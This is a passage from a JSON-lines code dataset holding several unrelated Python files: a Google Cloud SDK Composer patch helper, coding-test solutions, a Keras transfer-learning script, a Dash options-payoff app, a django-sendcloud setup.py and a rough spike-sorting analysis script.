and version specifier.\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n env_cls = messages.Environment\n pypi_packages_cls = (messages.SoftwareConfig.PypiPackagesValue)\n entry_cls = pypi_packages_cls.AdditionalProperty\n\n def _BuildEnv(entries):\n software_config = messages.SoftwareConfig(\n pypiPackages=pypi_packages_cls(additionalProperties=entries))\n config = messages.EnvironmentConfig(softwareConfig=software_config)\n return env_cls(config=config)\n\n return command_util.BuildPartialUpdate(\n clear_pypi_packages, remove_pypi_packages, update_pypi_packages,\n 'config.software_config.pypi_packages', entry_cls, _BuildEnv)\n\n\ndef _ConstructLabelsPatch(clear_labels,\n remove_labels,\n update_labels,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for updating labels.\n\n Args:\n clear_labels: bool, whether to clear the labels dictionary.\n remove_labels: iterable(string), Iterable of label names to remove.\n update_labels: {string: string}, dict of label names and values to set.\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n env_cls = messages.Environment\n entry_cls = env_cls.LabelsValue.AdditionalProperty\n\n def _BuildEnv(entries):\n return env_cls(labels=env_cls.LabelsValue(additionalProperties=entries))\n\n return command_util.BuildPartialUpdate(clear_labels, remove_labels,\n update_labels, 'labels', entry_cls,\n _BuildEnv)\n\n\ndef _ConstructAirflowConfigsPatch(clear_airflow_configs,\n remove_airflow_configs,\n update_airflow_configs,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for updating Airflow configs.\n\n Args:\n clear_airflow_configs: bool, whether to clear the Airflow configs\n dictionary.\n remove_airflow_configs: iterable(string), Iterable of Airflow config\n property names to remove.\n update_airflow_configs: {string: string}, dict of Airflow config property\n names and values to set.\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n env_cls = messages.Environment\n airflow_config_overrides_cls = (\n messages.SoftwareConfig.AirflowConfigOverridesValue)\n entry_cls = airflow_config_overrides_cls.AdditionalProperty\n\n def _BuildEnv(entries):\n software_config = messages.SoftwareConfig(\n airflowConfigOverrides=airflow_config_overrides_cls(\n additionalProperties=entries))\n config = messages.EnvironmentConfig(softwareConfig=software_config)\n return env_cls(config=config)\n\n return command_util.BuildPartialUpdate(\n clear_airflow_configs, remove_airflow_configs, update_airflow_configs,\n 'config.software_config.airflow_config_overrides', entry_cls, _BuildEnv)\n\n\ndef _ConstructEnvVariablesPatch(env_ref,\n clear_env_variables,\n remove_env_variables,\n update_env_variables,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for updating environment variables.\n\n Note that environment variable updates do not support partial update masks\n unlike other map updates due to comments in (b/78298321). For this reason, we\n need to retrieve the Environment, apply an update on EnvVariable dictionary,\n and patch the entire dictionary. The potential race condition here\n (environment variables being updated between when we retrieve them and when we\n send patch request)is not a concern since environment variable updates take\n 5 mins to complete, and environments cannot be updated while already in the\n updating state.\n\n Args:\n env_ref: resource argument, Environment resource argument for environment\n being updated.\n clear_env_variables: bool, whether to clear the environment variables\n dictionary.\n remove_env_variables: iterable(string), Iterable of environment variable\n names to remove.\n update_env_variables: {string: string}, dict of environment variable names\n and values to set.\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n env_obj = environments_api_util.Get(env_ref, release_track=release_track)\n initial_env_var_value = env_obj.config.softwareConfig.envVariables\n initial_env_var_list = (\n initial_env_var_value.additionalProperties\n if initial_env_var_value else [])\n\n messages = api_util.GetMessagesModule(release_track=release_track)\n env_cls = messages.Environment\n env_variables_cls = messages.SoftwareConfig.EnvVariablesValue\n entry_cls = env_variables_cls.AdditionalProperty\n\n def _BuildEnv(entries):\n software_config = messages.SoftwareConfig(\n envVariables=env_variables_cls(additionalProperties=entries))\n config = messages.EnvironmentConfig(softwareConfig=software_config)\n return env_cls(config=config)\n\n return ('config.software_config.env_variables',\n command_util.BuildFullMapUpdate(\n clear_env_variables, remove_env_variables, update_env_variables,\n initial_env_var_list, entry_cls, _BuildEnv))\n\n\ndef _ConstructImageVersionPatch(update_image_version,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for environment image version.\n\n Args:\n update_image_version: string, the target image version.\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n software_config = messages.SoftwareConfig(imageVersion=update_image_version)\n config = messages.EnvironmentConfig(softwareConfig=software_config)\n\n return 'config.software_config.image_version', messages.Environment(\n config=config)\n", "repo_name": "egzonarexhepi/mathpixlatexconverter", "sub_path": "frontend/matt12345/google-cloud-sdk/lib/googlecloudsdk/command_lib/composer/environment_patch_util.py", "file_name": "environment_patch_util.py", "file_ext": "py", "file_size_in_byte": 14495, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 18, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 18, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util.Patch", "line_number": 43, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util", "line_number": 43, "usage_type": "name"}, {"api_name": "googlecloudsdk.core.log.UpdatedResource", "line_number": 47, "usage_type": "call"}, {"api_name": "googlecloudsdk.core.log", "line_number": 47, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.operations_util.WaitForOperation", "line_number": 55, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.operations_util", "line_number": 55, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.Error", "line_number": 60, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 60, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.Error", "line_number": 61, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 61, "usage_type": "name"}, {"api_name": "six.text_type", "line_number": 62, "usage_type": "call"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 81, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 81, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.ParseRequirementsFile", "line_number": 125, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 125, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.Error", "line_number": 153, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 153, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 157, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 157, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 168, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 168, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 176, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 176, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 191, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 191, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildPartialUpdate", "line_number": 202, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 202, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 210, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 210, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 223, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 223, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildPartialUpdate", "line_number": 230, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 230, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 238, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 238, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 254, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 254, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildPartialUpdate", "line_number": 267, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 267, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 276, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 276, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util.Get", "line_number": 303, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util", "line_number": 303, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 309, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 309, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildFullMapUpdate", "line_number": 321, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 321, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 327, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 327, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 338, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 338, "usage_type": "name"}]} +{"seq_id": "3148603612", "text": "from collections import deque\n\ndef solution(queue1, queue2):\n answer = 0\n n = len(queue1)\n q1 = deque(queue1)\n q2 = deque(queue2)\n sum1 = sum(queue1)\n sum2 = sum(queue2)\n if (sum1+sum2)%2 == 1:\n return -1\n while True:\n if answer == 4*n:\n return -1\n if sum1 > sum2:\n value = q1.popleft()\n q2.append(value)\n sum1 -= value\n sum2 += value\n elif sum1 < sum2:\n value = q2.popleft()\n q1.append(value)\n sum1 += value\n sum2 -= value\n else:\n return answer\n answer += 1", "repo_name": "SongJungHyun1004/Coding_Test", "sub_path": "14주차/두 큐 합 같게 만들기.py", "file_name": "두 큐 합 같게 만들기.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "25375223572", "text": "import pickle\nimport tensorflow as tf\n# TODO: import Keras layers you need here\nfrom keras.layers import Input, Flatten, Dense\nfrom keras.models import Model\n\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# command line flags\nflags.DEFINE_string('training_file',\n 'vgg_cifar10_100_bottleneck_features_train.p',\n \"Bottleneck features training file (.p)\")\nflags.DEFINE_string('validation_file',\n 'vgg_cifar10_bottleneck_features_validation.p',\n \"Bottleneck features validation file (.p)\")\nflags.DEFINE_integer('epochs',\n 1,\n \"number of epoches\")\nflags.DEFINE_integer('batch_size',\n 32,\n \"batch size\")\n\n\n\ndef load_bottleneck_data(training_file, validation_file):\n \"\"\"\n Utility function to load bottleneck features.\n\n Arguments:\n training_file - String\n validation_file - String\n \"\"\"\n print(\"Training file\", training_file)\n print(\"Validation file\", validation_file)\n\n with open(training_file, 'rb') as f:\n train_data = pickle.load(f)\n with open(validation_file, 'rb') as f:\n validation_data = pickle.load(f)\n\n X_train = train_data['features']\n y_train = train_data['labels']\n X_val = validation_data['features']\n y_val = validation_data['labels']\n\n return X_train, y_train, X_val, y_val\n\n\ndef main(_):\n import numpy as np\n # load bottleneck data\n X_train, y_train, X_val, y_val = load_bottleneck_data(FLAGS.training_file, FLAGS.validation_file)\n\n print(X_train.shape, y_train.shape)\n print(X_val.shape, y_val.shape)\n\n nb_classes = len(np.unique(y_train))\n\n # define model\n input_shape = X_train.shape[1:]\n inp = Input(shape=input_shape)\n x = Flatten()(inp)\n x = Dense(nb_classes, activation='softmax')(x)\n model = Model(inp, x)\n model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n # train model\n model.fit(X_train, y_train, nb_epoch=FLAGS.epochs, batch_size=FLAGS.batch_size, validation_data=(X_val, y_val), shuffle=True)\n\n\n# parses flags and calls the `main` function above\nif __name__ == '__main__':\n from keras.datasets import cifar10\n from sklearn.model_selection import train_test_split\n \n tf.app.run()\n\n\n # 1) cifar10\n # Train on 1000 samples, validate on 10000 samples\n # 100 samples * 10 classes = 1000 training samples\n # VGG : loss: 0.0308 - acc: 1.0000 - val_loss: 0.9029 - val_acc: 0.7463\n # Inceltion : loss: 0.0129 - acc: 1.0000 - val_loss: 1.1957 - val_acc: 0.6625\n # resnet : loss: 0.0102 - acc: 1.0000 - val_loss: 0.8966 - val_acc: 0.7361\n\n # 2) Traffic Sign\n # Train on 4300 samples, validate on 12939 samples\n # 100 samples * 43 classes = 4300 training samples\n # VGG\n # Epoch 50/50\n # 4300/4300 [==============================] - 0s - loss: 0.0873 - acc: 0.9958 - val_loss: 0.4368 - val_acc: 0.8666\n # Inception\n # Epoch 50/50\n # 4300/4300 [==============================] - 0s - loss: 0.0276 - acc: 1.0000 - val_loss: 0.8378 - val_acc: 0.7519\n # ResNet\n # Epoch 50/50\n # 4300/4300 [==============================] - 0s - loss: 0.0332 - acc: 1.0000 - val_loss: 0.6146 - val_acc: 0.8108\n\n\n\n\n\n", "repo_name": "penny4860/CarND-Transfer-Learning-Lab", "sub_path": "feature_extraction.py", "file_name": "feature_extraction.py", "file_ext": "py", "file_size_in_byte": 3278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow.app", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.app.run", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "72565142594", "text": "'''\n\nDescription:\n\nGiven an integer, write a function to determine if it is a power of two.\n\nExample 1:\n\nInput: 1\nOutput: true \nExplanation: 20 = 1\n\n\n\nExample 2:\n\nInput: 16\nOutput: true\nExplanation: 24 = 16\n\n\n\nExample 3:\n\nInput: 218\nOutput: false\n\n'''\n\n\n\nclass Solution:\n def isPowerOfTwo(self, n: int) -> bool:\n \n if n <= 0:\n return False \n \n # note:\n # power of 2 in binary = b' 1000 ... 0\n # power of 2 minus 1 in binary = b' 0111 ... 1\n # bitwise AND of n and (n-1) must be 0 if n is power of 2\n \n return ( n & ( n-1 ) ) == 0\n\n\n\n# n : the value of Input\n\n## Time Complexity: O( log n )\n#\n# The overhead in time is the cost of bitwise operation, which is of O( log n )\n\n## Space Complexity: O( 1 )\n#\n# The overhead in space is the storage for temporary variable, which is of O( 1 )\n\n\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'n')\n\ndef test_bench():\n\n test_data = [\n TestEntry( n = -1 ), # False\n TestEntry( n = -2 ), # False\n TestEntry( n = 0 ), # False\n TestEntry( n = 1 ), # True\n TestEntry( n = 2 ), # True\n TestEntry( n = 3 ), # False\n TestEntry( n = 4 ), # True\n TestEntry( n = 218 ), # False\n TestEntry( n = 256 ), # True\n TestEntry( n = 1024 ), # True\n TestEntry( n = 1025 ), # False\n ]\n \n for t in test_data:\n\n print( Solution().isPowerOfTwo(t.n))\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()", "repo_name": "brianchiang-tw/leetcode", "sub_path": "2020_June_Leetcode_30_days_challenge/Week_2_Power of Two/by_bit_manipulation.py", "file_name": "by_bit_manipulation.py", "file_ext": "py", "file_size_in_byte": 1709, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.namedtuple", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "4304117327", "text": "from setuptools import setup, find_packages\nimport os\nimport platform\n\nDESCRIPTION = \"A Django email backend for SendCloud\"\n\nLONG_DESCRIPTION = None\ntry:\n LONG_DESCRIPTION = open('README.rst').read()\nexcept:\n pass\n\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Framework :: Django',\n]\n\nsetup(\n name='django-sendcloud',\n version='0.4',\n packages=['sendcloud'],\n author='jiaxin',\n author_email='jiaxin@guoku.com',\n url='http://github.com/guoku/django-sendcloud/',\n license='MIT',\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n platforms=['any'],\n install_requires=['requests==2.6.0', 'django==1.6.11'],\n classifiers=CLASSIFIERS,\n zip_safe = False,\n)\n\n__author__ = 'edison7500'\n", "repo_name": "guoku/django-sendcloud", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 982, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "setuptools.setup", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "72742391875", "text": "import dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objs as go\nfrom app import app, indicator, Graph\n\napp.config['suppress_callback_exceptions']=True\n\n\ndef update_graph(xvalues, yvalues, xtitle, ytitle):\n trace = go.Scatter(\n x = xvalues,\n y = yvalues,\n mode='lines',\n opacity=0.7,)\n layout = go.Layout(\n xaxis = {'title': xtitle},\n yaxis = {'title': ytitle},\n margin = {'l': 40, 'b': 40, 't': 10, 'r': 10},\n legend = {'x': 0, 'y': 1},\n annotations=[dict(x=xvalues[50], y=yvalues[50], xref='x', yref='y', text='Now', showarrow=True)],\n hovermode = 'closest')\n return {\"data\": [trace], \"layout\": layout}\n\n\ndef options_payoff(Call_Put_Flag, Long_Short_Flag, strike_price, spot, premium):\n sT = np.arange(spot - 50, spot + 50, 1)\n if Long_Short_Flag == 1:\n if Call_Put_Flag == 'Call':\n def payoff(sT, strike_price, premium):\n return np.where(sT > strike_price, sT - strike_price, 0) - premium\n payoff = payoff(sT, strike_price, premium)\n else:\n def payoff(sT, strike_price, premium):\n return np.where(sT < strike_price, strike_price - sT, 0) - premium\n payoff = payoff(sT, strike_price, premium)\n else:\n if Call_Put_Flag == 'Call':\n def payoff(sT, strike_price, premium):\n return np.where(sT > strike_price, -sT + strike_price, 0) + premium\n payoff = payoff(sT, strike_price, premium)\n else:\n def payoff(sT, strike_price, premium):\n return np.where(sT < strike_price, -strike_price + sT, 0) + premium\n payoff = payoff(sT, strike_price, premium)\n return payoff\n\n\ndef payoff_intrinsicValue(df):\n spot = 0\n payoff = np.zeros(100)\n premium_paid = 0\n for i in range(len(df)):\n strike = df['strike'][i]\n spot = df['Spot Price'][i]\n premium = (df['ask'][i] + df['bid'][i]) / 2\n long_short = df['Long_Short_Flag'][i]\n call_put = df['Call_Put_Flag'][i]\n\n payoff1 = options_payoff(call_put, long_short, strike, spot, premium)\n payoff = payoff1 + payoff\n if long_short == 1:\n premium_paid = premium_paid + premium\n else:\n premium_paid = premium_paid - premium\n\n intrinsic_value = payoff[50] + premium_paid\n sT = np.arange(spot - 50, spot + 50, 1)\n return sT.tolist(), payoff.tolist(), intrinsic_value\n\n\nlayout = [html.Div(Graph('Payoff', 'payoff'),className=\"row\",style={\"marginTop\": \"5px\"},),\n html.Div(indicator(\"#00cc96\", \"Intrinsic Value\", \"intrinsic_value\",), className=\"row\", style={\"marginTop\": \"5px\"},)]\n\n\n# payoff graph callback\n@app.callback(Output(\"payoff\", \"figure\"),\n [Input(\"options_df\", \"children\")],)\ndef payoff_graph_callback(df):\n df = pd.read_json(df, orient=\"split\")\n result_basics = payoff_intrinsicValue(df)\n return update_graph(result_basics[0], result_basics[1], 'Stock Price', 'Profit and Loss')\n\n\n# intrinsic value callback\n@app.callback(Output(\"intrinsic_value\", \"children\"),\n [Input(\"options_df\", \"children\")],)\ndef intrinsic_value_callback(df):\n df = pd.read_json(df, orient=\"split\")\n result_basics = payoff_intrinsicValue(df)\n return round(result_basics[2], 3)\n", "repo_name": "yh2334/Capstone-project-Derivatives-analyzer", "sub_path": "apps/basics.py", "file_name": "basics.py", "file_ext": "py", "file_size_in_byte": 3443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.app.config", "line_number": 10, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 10, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 14, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 14, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 19, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 75, "usage_type": "call"}, {"api_name": "app.Graph", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 76, "usage_type": "call"}, {"api_name": "app.indicator", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 83, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 80, "usage_type": "call"}, {"api_name": "app.app", "line_number": 80, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 80, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 92, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 89, "usage_type": "call"}, {"api_name": "app.app", "line_number": 89, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 89, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "738551915", "text": "from spikesorting_tsne import preprocessing_kilosort_results as preproc\nfrom BrainDataAnalysis import ploting_functions as pf\nfrom t_sne_bhcuda import tsne_cluster as tsne_cl\nfrom spikesorting_tsne import io_with_cpp as io\nfrom __future__ import print_function, absolute_import, division\nimport numpy as np\nfrom os.path import join\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport pandas as pd\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\n\n\nspike_info = preproc.generate_spike_info_from_full_tsne(base_folder, files_dir)\n\n\n\nspike_templates = np.load(join(base_folder, 'spike_templates.npy'))\ntemplate_markings = np.load(join(base_folder, 'template_marking.npy'))\nclean_templates_index = np.argwhere(template_markings > 0)\nclean_spikes_index = np.squeeze(np.argwhere(np.in1d(spike_templates, clean_templates_index)))\n\nnp.save(join(files_dir, 'indices_of_spikes_used.npy'), clean_spikes_index)\nspikes_used = np.load(join(files_dir, 'indices_of_spikes_used.npy'))\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\nlabels_dict = pf.generate_labels_dict_from_cluster_info_dataframe(cluster_info=cluster_info)\n\ncluster_info = create_cluster_info_from_kilosort_spike_templates(join(base_folder, 'cluster_info.pkl'),\n spike_templates_clean)\n\n\ndef create_cluster_info_from_kilosort_spike_templates(cluster_info_filename, spike_templates):\n kilosort_units = {}\n for i in np.arange(len(spike_templates)):\n cluster = spike_templates[i][0]\n if cluster in kilosort_units:\n kilosort_units[cluster] = np.append(kilosort_units[cluster], i)\n else:\n kilosort_units[cluster] = i\n\n cluster_info = pd.DataFrame(columns=['Cluster', 'Num_of_Spikes', 'Spike_Indices'])\n cluster_info = cluster_info.set_index('Cluster')\n cluster_info['Spike_Indices'] = cluster_info['Spike_Indices'].astype(list)\n\n cluster_info.set_value('UNLABELED', 'Num_of_Spikes', 0)\n cluster_info.set_value('UNLABELED', 'Spike_Indices', [])\n cluster_info.set_value('NOISE', 'Num_of_Spikes', 0)\n cluster_info.set_value('NOISE', 'Spike_Indices', [])\n cluster_info.set_value('MUA', 'Num_of_Spikes', 0)\n cluster_info.set_value('MUA', 'Spike_Indices', [])\n for g in kilosort_units.keys():\n if np.size(kilosort_units[g]) == 1:\n kilosort_units[g] = [kilosort_units[g]]\n cluster_name = str(g)\n cluster_info.set_value(cluster_name, 'Num_of_Spikes', len(kilosort_units[g]))\n cluster_info.set_value(cluster_name, 'Spike_Indices', kilosort_units[g])\n\n cluster_info.to_pickle(cluster_info_filename)\n return cluster_info\n\n\n\nspike_templates = np.load(join(base_folder, 'spike_templates.npy'))\ntemplate_markings = np.load(join(base_folder, 'template_marking.npy'))\nclean_templates_index = np.argwhere(template_markings > 0)\nclean_spikes_index = np.squeeze(np.argwhere(np.in1d(spike_templates, clean_templates_index)))\n\nnp.save(join(files_dir, 'indices_of_spikes_used.npy'), clean_spikes_index)\nspikes_used = np.load(join(files_dir, 'indices_of_spikes_used.npy'))\n\nspike_templates_clean = spike_templates[spikes_used]\n\ncluster_info = tsne_cl.create_cluster_info_from_kilosort_spike_templates(join(base_folder, 'cluster_info.pkl'),\n spike_templates_clean)\nlabels_dict = pf.generate_labels_dict_from_cluster_info_dataframe(cluster_info=cluster_info)\n\n\ntsne = io.load_tsne_result(files_dir=files_dir)\n\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\nfrom os.path import join\nimport numpy as np\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\nnp.sum(q)\nindices.shape\nr = np.in1d(spiketemplates,indices)\nindices.shape\nindices.max()\nindices.min()\nnp.sum(q)\nq.max()\nt.shape\nspiketemplates.shape\nclean_spike_indices.shape\nclean_spike_indices = np.argwhere(np.in1d(spiketemplates,indices))\nindices = np.argwhere(q)\nq = t>0\nspiketemplates = np.load(r\"F:\\kilosort_ch4\\kilosort\\18_26_30_afterREFeachGroup\\spike_templates.npy\")\nt= np.load(r\"F:\\kilosort_ch4\\kilosort\\18_26_30_afterREFeachGroup\\template_marking.npy\")\n\n\n\ncl.cleanup_kilosorted_data(r'F:\\kilosort_ch4\\kilosort\\18_26_30_afterREFeachGroup', 1440, r'F:\\kilosort_ch4\\18_26_30_afterREFeachGroup.bin', r'F:\\kilosort_ch4\\prb.txt',num_of_shanks_for_vis=3)\n", "repo_name": "georgedimitriadis/themeaningofbrain", "sub_path": "ExperimentSpecificCode/Joana Neto/Previous code/tsne_run.py", "file_name": "tsne_run.py", "file_ext": "py", "file_size_in_byte": 4768, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "spikesorting_tsne.preprocessing_kilosort_results.generate_spike_info_from_full_tsne", "line_number": 18, "usage_type": "call"}, {"api_name": "spikesorting_tsne.preprocessing_kilosort_results", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 